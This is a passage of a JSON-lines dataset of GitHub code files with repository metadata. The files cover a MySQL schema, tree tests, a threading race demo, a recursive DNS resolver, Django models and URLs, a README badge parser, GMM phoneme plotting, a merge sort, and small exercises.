mydatabase\")\n self.mycursor.execute(\"USE mydatabase\")\n # Création des deux tables #\n self.mycursor.execute(\n \"CREATE TABLE IF NOT exists Categories(id_categories INT PRIMARY KEY NOT NULL AUTO_INCREMENT,\"\n \"nom VARCHAR(40))\")\n self.mycursor.execute(\n \"CREATE TABLE IF NOT exists Products(id_product INT PRIMARY KEY NOT NULL AUTO_INCREMENT,\"\n \"nom VARCHAR(255) NOT NULL, \"\n \"grade ENUM('a', 'b', 'c', 'd', 'e', 'X') NOT NULL,\"\n \"url VARCHAR(255),\"\n \"stores VARCHAR(255),\"\n \"id_categories INT,\"\n \"FOREIGN KEY (id_categories) REFERENCES Categories(id_categories))\")\n self.mycursor.execute(\n \"CREATE TABLE IF NOT exists Substitute(id_substitute INT PRIMARY KEY NOT NULL AUTO_INCREMENT,\"\n \"id_product INT NOT NULL,\"\n \"id_substitute_product INT NOT NULL,\"\n \"FOREIGN KEY 
(id_product) REFERENCES Products(id_product),\"\n \"FOREIGN KEY (id_substitute_product) REFERENCES Products(id_product))\")\n","repo_name":"Zyllane/Open-FactFood","sub_path":"Classes/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32832976848","text":"import unittest\nfrom tree.tree import Tree, Node\n\n\nclass Test(unittest.TestCase):\n\n def setUp(self):\n self.answer1 = [[1]]\n self.answer2 = [[\"|\", \"|\", \"|\", 1, \"|\", \"|\", \"|\"],\n [\"|\", 2, \"|\", \"|\", \"|\", \"|\", \"|\"],\n [3, \"|\", \"|\", \"|\", \"|\", \"|\", \"|\"]]\n self.answer3 = [[\"|\", \"|\", \"|\", 1, \"|\", \"|\", \"|\"],\n [\"|\", 2, \"|\", \"|\", \"|\", 3, \"|\"],\n [4, \"|\", 5, \"|\", 6, \"|\", 7]]\n self.answer4 = [[\"|\", \"|\", \"|\", 7, \"|\", \"|\", \"|\"],\n [\"|\", 9, \"|\", \"|\", \"|\", 6, \"|\"],\n [\"|\", \"|\", 4, \"|\", 2, \"|\", \"|\"]]\n\n # test base case, only root in the tree\n def test1(self):\n a = Node(1, None, None)\n tree1 = Tree(a)\n assert tree1.print_tree() == self.answer1\n\n # test when there is only left child\n def test2(self):\n c = Node(3, None, None)\n b = Node(2, c, None)\n a = Node(1, b, None)\n tree2 = Tree(a)\n assert tree2.print_tree() == self.answer2\n\n # test for a full tree\n def test3(self):\n d = Node(4, None, None)\n e = Node(5, None, None)\n f = Node(6, None, None)\n g = Node(7, None, None)\n b = Node(2, d, e)\n c = Node(3, f, g)\n a = Node(1, b, c)\n tree3 = Tree(a)\n assert tree3.print_tree() == self.answer3\n\n # test for a full tree\n def test4(self):\n d = Node(4, None, None)\n e = Node(2, None, None)\n b = Node(9, None, d)\n c = Node(6, e, None)\n a = Node(7, b, c)\n tree4 = Tree(a)\n assert tree4.print_tree() == self.answer4\n","repo_name":"smallwhiterabbite/ORIE-5270","sub_path":"hw2/tests/test_tree.py","file_name":"test_tree.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38268017012","text":"\nfrom threading import Thread\n\n# shared counter: both threads update it without a lock, so the final value is nondeterministic (a data race)\ni = 0\n\ndef createThread1():\n global i\n for n in range (0,1000000):\n i = i +1\n\ndef createThread2():\n global i\n for n in range (0,1000000):\n i = i -1\n\n\n\ndef main():\n thread_1 = Thread( target = createThread1, args=(),)\n thread_1.start()\n thread_2 = Thread( target = createThread2, args =(),)\n thread_2.start()\n\n \n thread_1.join()\n thread_2.join()\n\n print(\"hello\")\n print(i)\n\n\n\n\nmain()\n","repo_name":"Monskil/Gomp","sub_path":"Exercises/Exercise 1/task1inpython.py","file_name":"task1inpython.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40966552448","text":"from aiohttp import web\nimport time\nimport typing as tp\n\nimport cache\nimport dns_request\n\n\nasync def handler(request: web.Request) -> web.Response:\n domain = (request.query.get(\"domain\") or \"\").lower() # guard against a missing query parameter\n if not domain or not valid(domain):\n return web.json_response(text=\"Domain must be specified and valid\", status=404)\n\n do_trace = request.query.get(\"trace\") is not None\n writer = ResponseWriter(do_trace)\n\n addresses = None\n if not do_trace:\n addresses = request.app['cache'].get(domain)\n\n if addresses is None:\n addresses = await find_recursive(domain, root_dns_servers, writer)\n if addresses is not None:\n request.app['cache'][domain] = addresses\n\n if addresses is None:\n 
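# resolution failed both in the cache and by iterating down from the root servers; report the failure\n 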
writer.write_forced(\"Couldn't find ip for domain\")\n return web.json_response(text=writer.result(), status=404)\n writer.write(\"\")\n writer.write_forced(\"\\n\".join(map(lambda ip: f\"{ip} {domain}\", addresses.ips)))\n return web.json_response(text=writer.result())\n\n\nasync def find_recursive(domain: str, dns_servers: tp.Dict[str, str], writer) -> tp.Optional[cache.Record]:\n for server_domain, host in dns_servers.items():\n writer.write(f\"{host} {server_domain}\")\n response = dns_request.send(domain, host)\n if not response:\n continue\n\n if response.aa:\n ips = []\n ttl = 0\n for record in response.a_records:\n if record.domain.startswith(domain):\n ips.append(str(record.ip))\n ttl = record.ttl\n if not ips:\n return None\n return cache.Record(deadline=time.time() + ttl, ips=ips)\n\n new_domains = [record.domain for record in response.ns_records]\n new_servers = {}\n for a_record in response.a_records:\n if a_record.domain not in new_domains:\n continue\n new_servers[a_record.domain] = a_record.ip\n if not new_servers:\n if new_domains:\n # try to find domains recursively\n writer.write(\"\")\n result = await find_recursive(new_domains[0], root_dns_servers, writer)\n if result:\n dns_servers = {}\n for ip in result.ips:\n dns_servers[new_domains[0]] = ip\n writer.write(\"\")\n return await find_recursive(domain, dns_servers, writer)\n continue\n writer.write(\"\")\n return await find_recursive(domain, new_servers, writer)\n return None\n\n\ndef valid(domain: str) -> bool:\n for ch in domain:\n if not (ch.isalnum() or ch in \".-\"):\n return False\n labels = domain.split(\".\")\n if not labels[-1]:\n labels.pop()\n for label in labels:\n if not label or label.startswith((\".\", \"-\")):\n return False\n return True\n\n\nclass ResponseWriter:\n def __init__(self, do_trace=False):\n self.do_trace = do_trace\n self.parts = []\n\n def write(self, data: str):\n if self.do_trace:\n self.parts.append(data)\n\n def write_forced(self, data: str):\n self.parts.append(data)\n\n def result(self):\n return \"\\n\".join(self.parts)\n\n\nroot_dns_servers = {\n \"a.root-servers.net\": '198.41.0.4',\n \"b.root-servers.net\": '199.9.14.201',\n \"c.root-servers.net\": '192.33.4.12',\n \"d.root-servers.net\": '199.7.91.13',\n \"e.root-servers.net\": '192.203.230.10',\n \"f.root-servers.net\": '192.5.5.241',\n \"g.root-servers.net\": '192.112.36.4',\n \"h.root-servers.net\": '198.97.190.53',\n \"i.root-servers.net\": '192.36.148.17',\n \"j.root-servers.net\": '192.58.128.30',\n \"k.root-servers.net\": '193.0.14.129',\n \"l.root-servers.net\": '199.7.83.42',\n \"m.root-servers.net\": '202.12.27.33',\n}\n","repo_name":"pkositsyn/network","sub_path":"recursor/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16362771352","text":"import random\n\n# ask for users name\nprint('What is your name?')\nname = input()\n# validate? nah\n\n# pick a random number from 1-20\nnumber = random.randint(1,20)\nprint('Hello,', name, 'I am thinking of a number between 1 and 20')\n\nguess = '' # start with empty string for edge case where user inputs only garbage\n\n# ask for guesses\nfor guessCount in range(1,7): # I forgot that it tells you i at the end, so this should be (1,7) instead of (0,6)\n print('Take a guess')\n try:\n guess = int(input())\n except:\n print('hmm. 
that does not seem to be a number.')\n continue # go back to start of loop to ask for another guess\n # compare guess to number\n if guess > number: # if high, tell\n print('too high')\n continue # go back to start of loop to ask for another guess\n elif guess < number:# if just right, finish\n print('too low')\n continue # go back to start of loop to ask for another guess\n else: # if just right, finish\n# sys.exit() # unnecessary. Just break out of the for loop and then check if number == guess\n break\nif guess == number: # if they're the same, you guessed correctly\n print('Good job', name + '! It took you', guessCount, 'guesses.') # this is how Al did it in the video. I'm very surprised that the counter guessCount is available after the for loop terminates. Also, print('string', int + 'string) works, but seems sketchy\nelse: # if too many guesses, you failed\n print('Nope. The number was', number)\n","repo_name":"erikbaxstrom/4--AutomateTheBoringStuffWithPython-Lesson12","sub_path":"numberGuessingGame.py","file_name":"numberGuessingGame.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26693616892","text":"#An example of using the library \nfrom library import *\n\nlib = Library('PicsArtLib')\n\nb1 = Book('Dive Into Systems', 814)\nb2 = Book('Practical Binary Analysis', 460)\nb3 = Book('OOAD with Applications', 717)\nb4 = Book('Learning Python', 1213)\nb5 = Book('Effective Python', 469)\nb6 = Book('Compilers: Principles, Techniques, and Tools', 1040)\n\nlib.addBook(b1, 1)\nlib.addBook(b2, 2)\nlib.addBook(b3, 5)\nlib.addBook(b4, 3)\nlib.addBook(b5, 10)\nlib.addBook(b6, 2)\n\nlib.viewLibrary()\n\nstudent1 = Student('Molly')\nstudent2 = Student('Melanie')\n\nlib.createCard('Molly', 2)\nlib.createCard('Melanie', 3)\n\nlib.takeBook(student1, 'Dive Into Systems')\nlib.takeBook(student1, 'Practical Binary Analysis')\nprint('{} currently owns the following books:'.format(student1.getName()))\nprint(student1.viewBooks())\n\nlib.takeBook(student2, 'Dive Into Systems')\nlib.takeBook(student2, 'OOAD with Applications')\nprint('{} currently owns the following books:'.format(student2.getName()))\nprint(student2.viewBooks())\n\nlib.returnBook(student1, 'Dive Into Systems')\nprint(\"{}'s currently available books: \".format(lib.getName()))\nlib.viewLibrary()\n","repo_name":"Margarita-Harutyunyan/Library_Class","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"204048876","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom print_values import *\nfrom plot_data_all_phonemes import *\nfrom plot_data import *\nimport random\nfrom sklearn.preprocessing import normalize\nfrom get_predictions import *\nfrom plot_gaussians import *\n\n# File that contains the data\ndata_npy_file = 'data/PB_data.npy'\n\n# Loading data from .npy file\ndata = np.load(data_npy_file, allow_pickle=True)\ndata = np.ndarray.tolist(data)\n\n# Make a folder to save the figures\nfigures_folder = os.path.join(os.getcwd(), 'figures')\nif not os.path.exists(figures_folder):\n os.makedirs(figures_folder, exist_ok=True)\n\n# Array that contains the phoneme ID (1-10) of each sample\nphoneme_id = data['phoneme_id']\n# frequencies f1 and f2\nf1 = data['f1']\nf2 = data['f2']\n\n# Initialize array containing f1 & f2, of all phonemes.\nX_full = np.zeros((len(f1), 
2))\n#########################################\n# Write your code here\n# Store f1 in the first column of X_full, and f2 in the second column of X_full\nX_full[:, 0] = f1\nX_full[:, 1] = f2\n########################################/\nX_full = X_full.astype(np.float32)\n\n# number of GMM components\nk = 6\n\n#########################################\n# Write your code here\n\n# Create an array named \"X_phonemes_1_2\", containing only samples that belong to phoneme 1 and samples that belong to\n# phoneme 2. The shape of X_phonemes_1_2 will be two-dimensional. Each row will represent a sample of the dataset,\n# and each column will represent a feature (e.g. f1 or f2) Fill X_phonemes_1_2 with the samples of X_full that belong\n# to the chosen phonemes To fill X_phonemes_1_2, you can leverage the phoneme_id array, that contains the ID of each\n# sample of X_full\n\nX_phonemes_1_2 = X_full[np.logical_or(phoneme_id == 1, phoneme_id == 2), :]\n\n########################################/\n\n# as dataset X, we will use only the samples of phoneme 1 and 2\nX = X_phonemes_1_2.copy()\n\nmin_f1 = int(np.min(X[:,0]))\nmax_f1 = int(np.max(X[:,0]))\nmin_f2 = int(np.min(X[:,1]))\nmax_f2 = int(np.max(X[:,1]))\nN_f1 = max_f1 - min_f1\nN_f2 = max_f2 - min_f2\nprint('f1 range: {}-{} | {} points'.format(min_f1, max_f1, N_f1))\nprint('f2 range: {}-{} | {} points'.format(min_f2, max_f2, N_f2))\n\n#########################################\n# Write your code here\n\n# Create a custom grid of shape N_f1 x N_f2 The grid will span all the values of (f1, f2) pairs, between [min_f1,\n# max_f1] on f1 axis, and between [min_f2, max_f2] on f2 axis Then, classify each point [i.e., each (f1, f2) pair] of\n# that grid, to either phoneme 1, or phoneme 2, using the two trained GMMs Do predictions, using GMM trained on\n# phoneme 1, on custom grid Do predictions, using GMM trained on phoneme 2, on custom grid Compare these predictions,\n# to classify each point of the grid Store these prediction in a 2D numpy array named \"M\", of shape N_f2 x N_f1 (the\n# first dimension is f2 so that we keep f2 in the vertical axis of the plot) M should contain \"0.0\" in the points\n# that belong to phoneme 1 and \"1.0\" in the points that belong to phoneme 2 #######################################/\n# Generate grid\nax_f1 = np.linspace(min_f1, max_f1, N_f1)\nax_f2 = np.linspace(min_f2, max_f2, N_f2)\nx_axis, y_axis = np.meshgrid(ax_f1, ax_f2)\nsamples = np.stack((x_axis.flatten(), y_axis.flatten())).transpose()\n\n# Phoneme model no. 1\nphoneme_model_1 = 'data/GMM_params_phoneme_{:02}_k_{:02}.npy'.format(1, k)\nparams_1 = np.load(phoneme_model_1, allow_pickle=True)\nparams_1 = np.ndarray.tolist(params_1)\ncopy = samples.copy()\nZ_1 = get_predictions(\n params_1['mu'],\n params_1['s'],\n params_1['p'],\n copy\n)\n\n# Phoneme model no. 
2\nphoneme_model_2 = 'data/GMM_params_phoneme_{:02}_k_{:02}.npy'.format(2, k)\nparams_2 = np.load(phoneme_model_2, allow_pickle=True)\nparams_2 = np.ndarray.tolist(params_2)\nZ_2 = get_predictions(\n params_2['mu'],\n params_2['s'],\n params_2['p'],\n copy\n)\n\n# Get the predictions\npred_1 = Z_1.sum(axis=1)\npred_2 = Z_2.sum(axis=1)\npredictions = np.ones(len(copy)) * 2\npredictions[pred_1 >= pred_2] = 1\n\n# M\nM = predictions.reshape(N_f2, N_f1)\n################################################\n# Visualize predictions on custom grid\n\n# Create a figure\n#fig = plt.figure()\nfig, ax = plt.subplots()\n\n# use aspect='auto' (default is 'equal'), to force the plotted image to be square, when dimensions are unequal\nplt.imshow(M, aspect='auto')\n\n# set label of x axis\nax.set_xlabel('f1')\n# set label of y axis\nax.set_ylabel('f2')\n\n# set limits of axes\nplt.xlim((0, N_f1))\nplt.ylim((0, N_f2))\n\n# set range and strings of ticks on axes\nx_range = np.arange(0, N_f1, step=50)\nx_strings = [str(x+min_f1) for x in x_range]\nplt.xticks(x_range, x_strings)\ny_range = np.arange(0, N_f2, step=200)\ny_strings = [str(y+min_f2) for y in y_range]\nplt.yticks(y_range, y_strings)\n\n# set title of figure\ntitle_string = 'Predictions on custom grid'\nplt.title(title_string)\n\n# add a colorbar\nplt.colorbar()\n\n# N_samples = int(X.shape[0]/2)\n# plt.scatter(X[:N_samples, 0] - min_f1, X[:N_samples, 1] - min_f2, marker='.', color='red', label='Phoneme 1')\n# plt.scatter(X[N_samples:, 0] - min_f1, X[N_samples:, 1] - min_f2, marker='.', color='green', label='Phoneme 2')\n\nids = phoneme_id[np.isin(phoneme_id, [1, 2])]\nX1 = X[ids == 1]\nX2 = X[ids == 2]\nplt.scatter(X1[:, 0] - min_f1, X1[:, 1] - min_f2, marker='.', color='red', label='Phoneme 1')\nplt.scatter(X2[:, 0] - min_f1, X2[:, 1] - min_f2, marker='.', color='green', label='Phoneme 2')\n\n\n# add legend to the subplot\nplt.legend()\n\n# save the plotted points of the chosen phoneme, as a figure\nplot_filename = os.path.join(os.getcwd(), 'figures', 'GMM_predictions_on_grid.png')\nplt.savefig(plot_filename)\n\n################################################\n# enter non-interactive mode of matplotlib, to keep figures open\nplt.ioff()\nplt.show()","repo_name":"mughees-asif/postgraduate-artificial-intelligence","sub_path":"Semester A/Machine Learning/projects/project2/assgn_2/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":5790,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"38746005872","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.utils.text import slugify \nfrom django.urls import reverse\n\n# Create your models here.\n\n\nclass CustomUser(AbstractUser):\n slug = models.SlugField(max_length=200, unique=True, null=True)\n phone = models.CharField(verbose_name='telefon raqamingiz', max_length=255, blank=True)\n telegram = models.URLField(verbose_name='telegram URL', blank=True)\n image = models.ImageField(verbose_name='foto surat', upload_to='accounts/', blank=True)\n \n REGIONS = (\n ('Tashkent', 'Tashkent'),\n ('Andijan', 'Andijan'),\n ('Bukhara', 'Bukhara'),\n ('Fergana', 'Fergana'),\n ('Jizzakh', 'Jizzakh'),\n ('Xorazm', 'Xorazm'),\n ('Namangan', 'Namangan'),\n ('Navoiy', 'Navoiy'),\n ('Qashqadaryo', 'Qashqadaryo'),\n ('Samarkand', 'Samarkand'),\n ('Surxondaryo', 'Surxondaryo'),\n ('Karakalpakstan', 'Karakalpakstan'),\n )\n \n region = models.CharField(verbose_name='shahar yoki viloyatingizni 
tanlang',\n max_length=255,\n choices=REGIONS,\n default='Tashkent')\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.username)\n super(CustomUser, self).save(*args, **kwargs)\n\n def __str__(self):\n return self.username\n \n def get_absolute_url(self):\n return reverse('account_detail', args=[str(self.slug)])\n \n class Meta:\n ordering = ('username',)\n verbose_name = 'User'\n verbose_name_plural = 'Foydalanuvchilar 👨‍👨‍👧‍👦'\n","repo_name":"Rustam-Z/eightsoft-hackathon-dgu","sub_path":"accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6686806311","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Tag\nfrom typing import List\n\n\nclass GradleParser:\n \"\"\"\n This is an extremely simple and dumb Gradle build file parser.\n It does not actually understands the semantics of the Gradle file, but\n rather treats it as a simple text file and extracts out parts of it using\n some simple regexps.\n\n Currently only parses dependencies.\n \"\"\"\n def __init__(self, content: str):\n self.content = content\n self._parse_dependencies(self.content)\n\n def _parse_dependencies(self, content):\n lines = content.lower().split('\\n')\n self.dependencies = []\n\n for l in lines:\n l = l.lstrip()\n # Search for lines with 'compile' or 'testCompile'\n # See: https://docs.gradle.org/current/userguide/artifact_dependencies_tutorial.html\n if l.startswith('compile') or l.startswith('testcompile'):\n package = re.findall(r\"['\\\"]([^'\\\"]+)['\\\"]\", l)\n\n if len(package) > 1:\n # Long format - eg:\n # compile group: 'org.ocpsoft.prettytime', name: 'prettytime-nlp', version: '4.0.0.Final'\n name = package[1]\n else:\n # Short format - eg:\n # compile \"com.fasterxml.jackson.core:jackson-databind:$jacksonVersion\"\n try:\n name = package[0].split(':')[1]\n except IndexError:\n continue\n self.dependencies.append(name)\n\n\nclass ReadmeParser:\n codacy_prefix = 'https://api.codacy.com/project/badge/'\n travis_prefix = 'https://travis-ci.org/'\n coveralls_prefix = 'https://coveralls.io/repos/github/'\n src_attr = 'data-canonical-src'\n\n def __init__(self, content: str):\n self.content = content\n self.soup = BeautifulSoup(content, \"html.parser\")\n\n def img_tags(self, prefix=None) -> List[Tag]:\n tags = self.soup.select('img[{}]'.format(self.src_attr))\n if prefix:\n return [t for t in tags if t[self.src_attr].startswith(prefix)]\n return tags\n\n @property\n def images(self):\n img = self.soup.find_all(src=re.compile(r'\\.(png|jpe?g|gif)$', flags=re.I))\n return [i['src'] for i in img]\n\n @property\n def codacy_grade(self):\n for img in self.img_tags(self.codacy_prefix):\n r = requests.get(img[self.src_attr])\n soup = BeautifulSoup(r.text, 'html.parser')\n for text in soup.find_all('text'):\n if len(text.text.strip()) == 1:\n return text.text.strip()\n\n @property\n def coveralls_grade(self):\n for img in self.img_tags(self.coveralls_prefix):\n # Coveralls URL are in the form of\n # https://s3.amazonaws.com/assets.coveralls.io/badges/coveralls_83.svg\n # We need to parse out the '83' here\n r = requests.get(img[self.src_attr])\n return int(re.search(r'(\\d{1,2})\\.svg', r.url).group(1))\n\n @property\n def travis_status(self):\n for img in self.img_tags(self.travis_prefix):\n r = requests.get(img[self.src_attr])\n soup = BeautifulSoup(r.text, 'html.parser')\n for text in soup.find_all('text'):\n if 
text.text.strip() != 'build':\n return text.text.strip()\n\n @property\n def title(self):\n h1 = self.soup.find('h1')\n if h1:\n return h1.text.strip()\n return ''\n","repo_name":"ZhangYiJiang/cs2103-stats","sub_path":"parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"15489048591","text":"caderno_infos = {\n 'img': '/static/img/Caderno Turquesa Tilibra.jpg',\n 'titulo': 'Caderno espiral capa plástica sem pauta 1/4 80 folhas Neon Azul Turquesa Tilibra',\n 'preco': '18,91',\n 'marca': 'tilibra',\n 'cor': 'Turquesa',\n}\nbolsa_infos = {\n 'img': '/static/img/bolsa de couro.jpg',\n 'titulo': 'Bolsa de Couro Legítimo com alça trançada caramelo',\n 'preco': '215,99',\n 'marca': 'ARZON',\n 'cor': 'Caramelo',\n}\n\ncadeira_infos = {\n 'img': '/static/img/cadeira de madeira.jpg',\n 'titulo': 'Cadeira Texas de Madeira para Cozinha',\n 'preco': '289,99',\n 'marca': '--',\n 'cor': 'Amêndoa',\n}\n\ncadeira_gamer_infos = {\n 'img': '/static/img/cadeira gamer verde.jpg',\n 'titulo': 'Cadeira Gamer Xzone CGR-01-GR',\n 'preco': '1.089,90',\n 'marca': 'XZONE',\n 'cor': 'Preto / Verde',\n}\n\nventilador_infos = {\n 'img': '/static/img/ventilador.jpg',\n 'titulo': 'Ventilador Mondial, Turbo 8 pás - 40cm, 220V, Preto/Prata, 140W - VTX-40-8P',\n 'preco': '207,69',\n 'marca': 'Mondial',\n 'cor': 'Preto / Prata',\n}\n\npanela_infos = {\n 'img': '/static/img/panela.jpg',\n 'titulo': 'Panela Tramontina Turim em Alumínio com Revestimento Interno e Externo em Antiaderente Starflon Max Vermelha 16 cm 1,4 L',\n 'preco': '76,63',\n 'marca': 'Tramontina',\n 'cor': 'Vermelho / Prata',\n}\n\nescova_infos = {\n 'img': '/static/img/escova de cabelo.jpg',\n 'titulo': 'Escova para Cabelo Ricca - Almofadada Oval',\n 'preco': '15,67',\n 'marca': 'Ricca',\n 'cor': 'Roxo',\n}\n\ntenis_infos = {\n 'img': '/static/img/tenis all stars.jpg',\n 'titulo': 'Tenis Converse Chuck Taylor All Star',\n 'preco': '249,99',\n 'marca': 'All Stars',\n 'cor': 'Preto',\n}\n\ncamisa_infos = {\n 'img': '/static/img/Camisa social masculina.jpg',\n 'titulo': 'Camisa Social Masculina Preta',\n 'preco': '109,90',\n 'marca': \"Kelvy'S\",\n 'cor': 'Preta',\n}\n\nbola_infos = {\n 'img': '/static/img/bola de futebol.jpg',\n 'titulo': 'Bola de Futebol Semiprofissional Preto com Branco',\n 'preco': '74,90',\n 'marca': 'BBR Toys',\n 'cor': 'Preto com Branco',\n}\n\n\ndb = {\n 'caderno': caderno_infos,\n 'bolsa': bolsa_infos,\n 'cadeira': cadeira_infos,\n 'cadeira_gamer': cadeira_gamer_infos,\n 'ventilador': ventilador_infos,\n 'panela': panela_infos,\n 'escova': escova_infos,\n 'tenis': tenis_infos,\n 'camisa': camisa_infos,\n 'bola': bola_infos,\n}","repo_name":"Evy8882/Mercado-fict-cio","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13916496042","text":"#!/usr/bin/env python\n#--------------------------------------------------------------------------\n#sort.py\n#\n#sorting a list of integers in Python\n#\n# Date: 20-05-2013\n# Tested with Python3\n# TO RUN:\n# sudo chmod a+x sort.py\n# ./sort.py\n# OR JUST RUN : python3 sort.py\n#\n# @Author: Dlo Jiwan Bagari\n# @id 114702261\n# ---------------------------------------------------------------------------\nfrom sys import exit\nfrom random import randint\ndef get_list():\n #get user input and convert it to a list of numbers\n try:\n 
numbers = input()\n        return [int(item) for item in numbers.strip().split()]\n    except ValueError:\n        exit()\n\ndef sort(my_list):\n    # sort the list in place and return it.\n\n    # create a copy of the original list\n    alias = my_list[:]\n    \n    sort_recursion(alias, my_list, 0, len(my_list))\n    return my_list\n    \ndef sort_recursion(copy, original, start, end):\n    # sort the 'copy' list from 'start' up to 'end', and insert the result into 'original'\n    length = end - start\n    # base cases to terminate recursion.\n    if length <= 2:\n        if length == 2:\n            if original[start] > original[start + 1]:\n                # swap values\n                original[start], original[start + 1] = original[start + 1], original[start]\n        return\n    # find the position of the middle item in the list 'original'\n    divider = (start + end) // 2\n    # sort the first half of the list 'original' and put the result in the list 'copy'\n    sort_recursion(original, copy, start, divider)\n    # sort the second half of the list 'original' and put the result in the list 'copy'\n    sort_recursion(original, copy, divider, end)\n    # merge the items in order from the first and second halves of 'copy' back into 'original'\n    left = start\n    right = divider\n    position = start\n    while position < end:\n        if right == end or (left < divider and copy[left] < copy[right]):\n            original[position] = copy[left]\n            left += 1\n        else:\n            original[position] = copy[right]\n            right += 1\n        position += 1\n\n\nsort([randint(1,10000000) for _ in range(100000)])\n","repo_name":"DloBagari/python_scripts","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4391838261","text":"# https://www.acmicpc.net/problem/18869\n\ndef solve():\n    import sys\n    from collections import 
defaultdict\n M, N = map(int, sys.stdin.readline().split())\n universe = []\n # for _ in range(M):\n # temp = list(map(int, sys.stdin.readline().split()))\n # temp = [(idx, val) for idx, val in enumerate(temp)]\n # temp.sort(key=lambda x:x[1])\n # temp = [idx for idx, val in temp]\n # universe.append(','.join(map(str, temp)))\n \n uni_dict = defaultdict(int)\n for _ in range(M):\n temp = list(map(int, sys.stdin.readline().split()))\n s_temp = sorted(set(temp))\n temp_dict = dict()\n str_uni = ''\n for i in range(len(s_temp)):\n temp_dict[s_temp[i]] = i\n for te in temp:\n str_uni += str(temp_dict[te])\n uni_dict[str_uni] += 1\n \n result = 0\n for i in uni_dict.values():\n result += (i * (i - 1)) // 2\n \n print(result)\n\nif __name__ == \"__main__\":\n solve()","repo_name":"Carrotww/Carrot_Algorithm","sub_path":"2023/23_06/2023_06_10_ 백준_멀티버스2--resolve.py","file_name":"2023_06_10_ 백준_멀티버스2--resolve.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41751155511","text":"from django.conf.urls.defaults import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom django.views.generic.simple import direct_to_template\nfrom django.views.generic.list_detail import object_list\nfrom django.views.generic.list_detail import object_detail\nfrom vinovoter.models import WineBottle\nadmin.autodiscover()\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'vinovote.views.home', name='home'),\n # url(r'^vinovote/', include('vinovote.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n url(r'^vote/$','vinovoter.views.vote_lookup'),\n url(r'^taster/register/$','vinovoter.views.personreg'),\n url(r'^taster/(?P\\d+)/winereg/$','vinovoter.views.winereg'),\n url(r'^taster/(?P\\d+)/winereg/(?P\\w+)/$','vinovoter.views.wineregcomplete'),\n url(r'^taster/(?P\\d+)/vote/$','vinovoter.views.vote'),\n #url(r'^taster/\\d+/winereg/$','vinovoter.views.winereg'),\n url(r'^json/wineinfo/','vinovoter.views.winejson'),\n url(r'^json/regioninfo/','vinovoter.views.regionjson'),\n url(r'^$',direct_to_template, {'template': 'index.html'}),\n url(r'^thanks/$',direct_to_template, {'template': 'thanks.html'}),\n url(r'^error/dupvote/$',direct_to_template, {'template': 'dupvote.html'}),\n url(r'^results/$','vinovoter.views.results' ),\n url(r'^results/all/$',object_list,{'queryset':WineBottle.objects.all().order_by('winenum'),'template_name':'winebottle_list.html'} ),\n url(r'^results/(?P\\d+)/$',object_detail,{'queryset': WineBottle.objects.all(),'template_name':'winebottle_object.html'} ),\n)\n","repo_name":"mattva01/vinovote","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"22233190697","text":"from . 
import util as source_util\n\nfrom importlib import _bootstrap\nimport codecs\nimport re\nimport sys\n# Because sys.path gets essentially blanked, need to have unicodedata already\n# imported for the parser to use.\nimport unicodedata\nimport unittest\n\n\nCODING_RE = re.compile(r'^[ \\t\\f]*#.*coding[:=][ \\t]*([-\\w.]+)', re.ASCII)\n\n\nclass EncodingTest(unittest.TestCase):\n\n \"\"\"PEP 3120 makes UTF-8 the default encoding for source code\n [default encoding].\n\n PEP 263 specifies how that can change on a per-file basis. Either the first\n or second line can contain the encoding line [encoding first line]\n encoding second line]. If the file has the BOM marker it is considered UTF-8\n implicitly [BOM]. If any encoding is specified it must be UTF-8, else it is\n an error [BOM and utf-8][BOM conflict].\n\n \"\"\"\n\n variable = '\\u00fc'\n character = '\\u00c9'\n source_line = \"{0} = '{1}'\\n\".format(variable, character)\n module_name = '_temp'\n\n def run_test(self, source):\n with source_util.create_modules(self.module_name) as mapping:\n with open(mapping[self.module_name], 